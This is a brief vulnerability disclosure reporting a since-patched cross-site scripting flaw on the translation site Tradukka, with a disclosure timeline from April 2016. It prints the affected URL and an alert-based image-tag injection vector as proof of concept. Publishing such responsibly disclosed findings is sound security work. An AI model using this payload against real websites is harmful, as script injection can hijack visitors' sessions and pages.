Tradukka.com suffered from a cross site scripting vulnerability.
227aefd7dd2303ac6b8c1b12ff0f3df8af995ca725a860b372e2e8462b21d626
I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting (XSS)
II. PROOF OF CONCEPT
-------------------------
URL: https://tradukka.com/translate/en/es/
State: Fix & Patch
Vector: '><img src=x onerror=alert("XSS");>
III. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Translator Tradukka: https://tradukka.com
IV. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez aka "n0ipr0cs" (
https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050).
(https://twitter.com/n0ipr0cs).
V. DISCLOSURE TIMELINE
-------------------------
April 03, 2016: Vulnerability acquired by Francisco Javier Santiago
Vázquez.
aka "n0ipr0cs"
April 03, 2016 Responsible disclosure to Tradukka Security Team.
April 04, 2016 Solution - Fix & Patch
April 04, 2016 Disclosure
VI. Links
------------------------
POC :- https://www.estacion-informatica.com/2016/04/xss-en-tradukka.html
<https://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html>
*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<https://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<https://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*